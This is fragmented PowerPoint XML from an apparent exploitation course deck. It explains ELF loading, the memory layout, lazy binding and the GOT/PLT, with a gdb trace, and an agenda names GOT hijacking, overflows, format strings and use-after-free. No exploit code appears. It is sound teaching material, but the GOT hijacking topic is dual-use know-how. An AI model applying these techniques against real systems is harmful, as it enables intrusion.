        <p:spPr>
          <a:xfrm>
            <a:off x="2943425" y="4273900"/>
            <a:ext cx="17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Shape 703"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="694" idx="0"/>
            <a:endCxn id="695" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5710425" y="37948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Shape 704"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="695" idx="0"/>
            <a:endCxn id="705" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="5710425" y="3129300"/>
            <a:ext cx="81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Shape 706"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="696" idx="0"/>
            <a:endCxn id="697" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5718525" y="1995388"/>
            <a:ext cx="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Shape 707"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="442675" y="3302650"/>
            <a:ext cx="8263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708" name="Shape 708"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7150900" y="2841350"/>
            <a:ext cx="1166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mode</a:t>
            </a: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7150900" y="3482850"/>
            <a:ext cx="1166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mode</a:t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5135325" y="2841338"/>
            <a:ext cx="1166400" cy="28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ld.so</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="710" name="Shape 710"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="705" idx="0"/>
            <a:endCxn id="696" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5718525" y="2562338"/>
            <a:ext cx="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Shape 711"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7150900" y="1707438"/>
            <a:ext cx="1166400" cy="28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_init</a:t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7150900" y="2274388"/>
            <a:ext cx="1166400" cy="28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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="713" name="Shape 713"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="697" idx="3"/>
            <a:endCxn id="711" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572925" y="1851450"/>
            <a:ext cx="57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Shape 714"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="711" idx="2"/>
            <a:endCxn id="712" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7734100" y="1995438"/>
            <a:ext cx="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programs get run</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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311700" y="1152475"/>
            <a:ext cx="85206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sys_execve()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arguments and environment variables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do_execve()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 elf headers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filling the “binary parameter” structure (struct </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux_binprm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search_binary_handler()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scan a list of registered binary formats, passing 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binprm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structure to all of them until one succeeds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load_elf_binary()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parse program headers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find location of loader(ld.so) from .interp section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map memory segments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 return address of sys_execve() to the entry of ld.so or static linked binary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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="726" name="Shape 7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75" y="1120800"/>
            <a:ext cx="8075799" cy="37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Shape 727"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2227425" y="2002625"/>
            <a:ext cx="836100" cy="14265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4993725" y="2002625"/>
            <a:ext cx="339600" cy="14265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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072875" y="1700450"/>
            <a:ext cx="14616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Mapping Address</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill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4670550" y="1700450"/>
            <a:ext cx="14616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Permissions</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill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3204150" y="2494450"/>
            <a:ext cx="1461600" cy="1686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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3204150" y="3251150"/>
            <a:ext cx="14616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Path of the loader</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill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456725" y="3745200"/>
            <a:ext cx="7975200" cy="10047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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2513325" y="3703050"/>
            <a:ext cx="24054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Section to Segment mapping</a:t>
            </a:r>
            <a:endParaRPr sz="1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mapping</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="740" name="Shape 740"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4932700" y="1295900"/>
            <a:ext cx="2768700" cy="3551150"/>
            <a:chOff x="4897550" y="1085100"/>
            <a:chExt cx="2768700" cy="3551150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="741" name="Shape 741"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4897550" y="1212775"/>
              <a:ext cx="1363200" cy="2742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For Kernel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4897550" y="1486975"/>
              <a:ext cx="1363200" cy="27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Stack</a:t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897550" y="1761175"/>
              <a:ext cx="1363200" cy="603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897550" y="2365075"/>
              <a:ext cx="1363200" cy="44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shared libraries</a:t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897550" y="2807875"/>
              <a:ext cx="1363200" cy="603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897550" y="3411775"/>
              <a:ext cx="1363200" cy="274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Heap</a:t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897550" y="3685975"/>
              <a:ext cx="1363200" cy="274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</a:t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897550" y="3960175"/>
              <a:ext cx="1363200" cy="27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Code</a:t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897550" y="4234375"/>
              <a:ext cx="1363200" cy="2742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Unused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750" name="Shape 750"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="743" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5579150" y="1761175"/>
              <a:ext cx="0" cy="36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1" name="Shape 751"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="746" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="5579150" y="3077575"/>
              <a:ext cx="0" cy="33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2" name="Shape 752"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="1085100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0xFFFFFFFF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6619250" y="1359300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0xC0000000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6619250" y="2674225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0x40000000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6619250" y="4058550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0x08048000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56" name="Shape 756"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1218750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7" name="Shape 757"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="1492950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8" name="Shape 758"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="2807875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9" name="Shape 759"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500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0" name="Shape 760"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4495700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1" name="Shape 761"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4362050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0x00000000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62" name="Shape 762"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536650" y="1449525"/>
            <a:ext cx="13632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sections</a:t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1536650" y="2022225"/>
            <a:ext cx="1363200" cy="274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.data</a:t>
            </a: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1536650" y="2296425"/>
            <a:ext cx="1363200" cy="274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.bss</a:t>
            </a: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1536650" y="2570625"/>
            <a:ext cx="1363200" cy="274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1536650" y="2844825"/>
            <a:ext cx="1363200" cy="274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.rodata</a:t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1536650" y="3119025"/>
            <a:ext cx="1363200" cy="274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1536650" y="3393225"/>
            <a:ext cx="1363200" cy="274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.init</a:t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1536650" y="3667425"/>
            <a:ext cx="1363200" cy="274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 Header</a:t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2899850" y="2022225"/>
            <a:ext cx="339300" cy="822600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 45447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2899850" y="2844825"/>
            <a:ext cx="339300" cy="1096800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 45447" name="adj2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2" name="Shape 772"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="771" idx="1"/>
            <a:endCxn id="748" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3239150" y="3343288"/>
            <a:ext cx="1693500" cy="9648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Shape 773"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="770" idx="1"/>
            <a:endCxn id="747" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3239150" y="2396072"/>
            <a:ext cx="1693500" cy="16377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4" name="Shape 774"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="834175" y="2296425"/>
            <a:ext cx="472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834175" y="3256125"/>
            <a:ext cx="420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1759250" y="1096525"/>
            <a:ext cx="918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 Disk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5087675" y="1096525"/>
            <a:ext cx="1131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 Memory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78" name="Shape 778"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6295900" y="3993125"/>
            <a:ext cx="1405500" cy="274200"/>
            <a:chOff x="6260750" y="4058550"/>
            <a:chExt cx="1405500" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="779" name="Shape 779"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6619250" y="4058550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0x08049000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80" name="Shape 780"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6260750" y="4221500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ld.so &amp; _start &amp; __libc_start_main</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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ld.so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load all shared libraries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Initialize GOT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_start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 environment variables/.init/.fini/main to __libc_start_main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__libc_start_main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.init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main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.fini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exit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lgraph.png" id="791" name="Shape 7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25" y="0"/>
            <a:ext cx="6002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Linking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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Relocations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Are entries in binaries that are left to be filled in later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at link time by the toolchain linker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at runtime by the dynamic linker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Lazy Binding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function addresses are determined at runtime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function symbol will be resolved when it is first called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Offset Table</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody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 is a table to store external library functions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PLT(Procedure Linkage Table) code stub is filled to each entry in GOT initially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library function is called the first time, the real address will be filled to the corresponding GOT entry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PLT(Procedure Linkage Table) contains code stub to jump to the GOT entry for each library call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lazy binding in gdb</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="809" name="Shape 809"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736250" y="1175425"/>
            <a:ext cx="7269300" cy="3567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x/i 0x8048508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8048508:       e8 c3 fe ff ff         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call   80483d0 &lt;strcpy@plt&gt;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...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x/20i 0x80483a0 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0x80483a0:   push   DWORD PTR ds:0x8049748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0x80483a6:   jmp    DWORD PTR ds:0x804974c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0x80483d0 &lt;strcpy@plt&gt;:      jmp    DWORD PTR ds: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0x8049758</a:t>
            </a:r>
            <a:endParaRPr b="1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0x80483d6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&lt;strcpy@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plt+6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&gt;:    push   0x10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0x80483db &lt;strcpy@plt+11&gt;:   jmp    0x80483a0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0x80483e0 &lt;printf@plt&gt;:      jmp    DWORD PTR ds:0x804975c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0x80483e6 &lt;printf@plt+6&gt;:    push   0x18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0x80483eb &lt;printf@plt+11&gt;:   jmp    0x80483a0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x/2x 0x8049758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0x8049758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&lt;strcpy@got.plt&gt;:    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0x080483d6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0x080483e6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finish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x/2x 0x8049758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0x8049758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&lt;strcpy@got.plt&gt;:    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0xf7e8bd80</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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0x080483e6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0" name="Shape 810"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068075" y="1970164"/>
            <a:ext cx="3660600" cy="4269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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1005850" y="2533875"/>
            <a:ext cx="4988100" cy="529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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853125" y="1910475"/>
            <a:ext cx="3027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EA9999"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jump to  dl_runtime_resolve</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="EA999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Compiling and Linking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Calling Convention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Linking and GOT hijacking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memory corruptions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Overflow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 Overflow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 String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Heap Overflow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UAF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Offset Table</a:t>
            </a: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633525" y="2381400"/>
            <a:ext cx="12390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.dynamic</a:t>
            </a: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633525" y="2688600"/>
            <a:ext cx="12390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</a:t>
            </a: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633525" y="2995800"/>
            <a:ext cx="12390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633525" y="3303000"/>
            <a:ext cx="12390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.data</a:t>
            </a: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2697150" y="2154350"/>
            <a:ext cx="1907100" cy="307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 of .dynamic</a:t>
            </a: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2697150" y="2461550"/>
            <a:ext cx="1907100" cy="307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link_map</a:t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2697150" y="2768750"/>
            <a:ext cx="1907100" cy="307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dl_runtime_resolve</a:t>
            </a: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2697150" y="3075950"/>
            <a:ext cx="19071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printf@plt + 6</a:t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2697150" y="3383150"/>
            <a:ext cx="19071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puts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="827" name="Shape 827"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="822" idx="1"/>
            <a:endCxn id="818" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1872450" y="2307950"/>
            <a:ext cx="8247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Shape 828"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2397250" y="2302125"/>
            <a:ext cx="259200" cy="1254900"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd fmla="val 8333" name="adj1"/>
              <a:gd fmla="val 6693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9" name="Shape 829"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="820" idx="3"/>
            <a:endCxn id="828" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="1872525" y="3142200"/>
            <a:ext cx="5247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Shape 830"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="767350" y="2042875"/>
            <a:ext cx="995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sections</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="831" name="Shape 831"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985150" y="1869775"/>
            <a:ext cx="995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.got.plt</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="832" name="Shape 832"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5371650" y="1897700"/>
            <a:ext cx="32664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.dynamic section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info for dynamic linking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link_map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linked list of loaded libraries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dl_runtime_resolve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 in loader to resolve symbol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also execute the function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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="838" name="Shape 838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foo@plt+6</a:t>
            </a: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842" name="Shape 842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*(foo@GOT)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index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PLT0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3" name="Shape 843"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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*(GOT+4)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*(GOT+8)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4" name="Shape 844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845" name="Shape 845"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="846" name="Shape 846"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="847" name="Shape 847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8" name="Shape 848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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="849" name="Shape 849"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="840" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2626650" y="2094675"/>
            <a:ext cx="795300" cy="15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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="855" name="Shape 855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foo@plt+6</a:t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859" name="Shape 859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*(foo@GOT)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index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PLT0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0" name="Shape 860"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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*(GOT+4)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*(GOT+8)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1" name="Shape 861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862" name="Shape 862"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="863" name="Shape 863"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t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65" name="Shape 865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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="866" name="Shape 866"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="867" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2626650" y="2094675"/>
            <a:ext cx="795300" cy="15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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="873" name="Shape 873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foo@plt+6</a:t>
            </a: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877" name="Shape 877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jmp *(foo@GOT)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index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PLT0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8" name="Shape 878"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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*(GOT+4)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*(GOT+8)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880" name="Shape 880"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="881" name="Shape 881"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t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83" name="Shape 883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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="884" name="Shape 884"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="885" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2626650" y="2094675"/>
            <a:ext cx="795300" cy="15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Shape 886"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="25926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foo() is called the first time.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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="892" name="Shape 892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foo@plt+6</a:t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896" name="Shape 896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*(foo@GOT)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push index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PLT0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7" name="Shape 897"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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*(GOT+4)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*(GOT+8)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8" name="Shape 898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899" name="Shape 899"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="900" name="Shape 900"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t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02" name="Shape 902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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="903" name="Shape 903"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="904" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2626650" y="2094675"/>
            <a:ext cx="795300" cy="15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5" name="Shape 905"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="41688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the index of symbo 'foo' in relocation table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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="911" name="Shape 911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foo@plt+6</a:t>
            </a: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915" name="Shape 915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*(foo@GOT)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index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jmp PLT0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6" name="Shape 916"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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*(GOT+4)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*(GOT+8)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7" name="Shape 917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918" name="Shape 918"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="919" name="Shape 919"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t>
            </a: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21" name="Shape 921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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="922" name="Shape 922"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="923" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2626650" y="2094675"/>
            <a:ext cx="795300" cy="15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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="929" name="Shape 929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foo@plt+6</a:t>
            </a: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933" name="Shape 933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*(foo@GOT)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index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PLT0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4" name="Shape 934"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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push *(GOT+4)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*(GOT+8)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5" name="Shape 935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936" name="Shape 936"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="937" name="Shape 937"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t>
            </a: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39" name="Shape 939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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="940" name="Shape 940"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="941" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2626650" y="2094675"/>
            <a:ext cx="795300" cy="15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Shape 942"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="41688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link_map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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="948" name="Shape 948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9" name="Shape 949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foo@plt+6</a:t>
            </a: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952" name="Shape 952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*(foo@GOT)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index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PLT0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3" name="Shape 953"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525155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*(GOT+4)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999999"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>jmp *(GOT+8)</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="99999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4" name="Shape 954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955" name="Shape 955"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124675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</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="956" name="Shape 956"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="52515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PLT0</a:t>
            </a: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58" name="Shape 958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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="959" name="Shape 959"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="960" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2626650" y="2094675"/>
            <a:ext cx="795300" cy="15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1" name="Shape 961"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3225050" y="3111000"/>
            <a:ext cx="41688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dl_runtime_resolve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dl_runtime_resolve(link_map, index)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Binding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
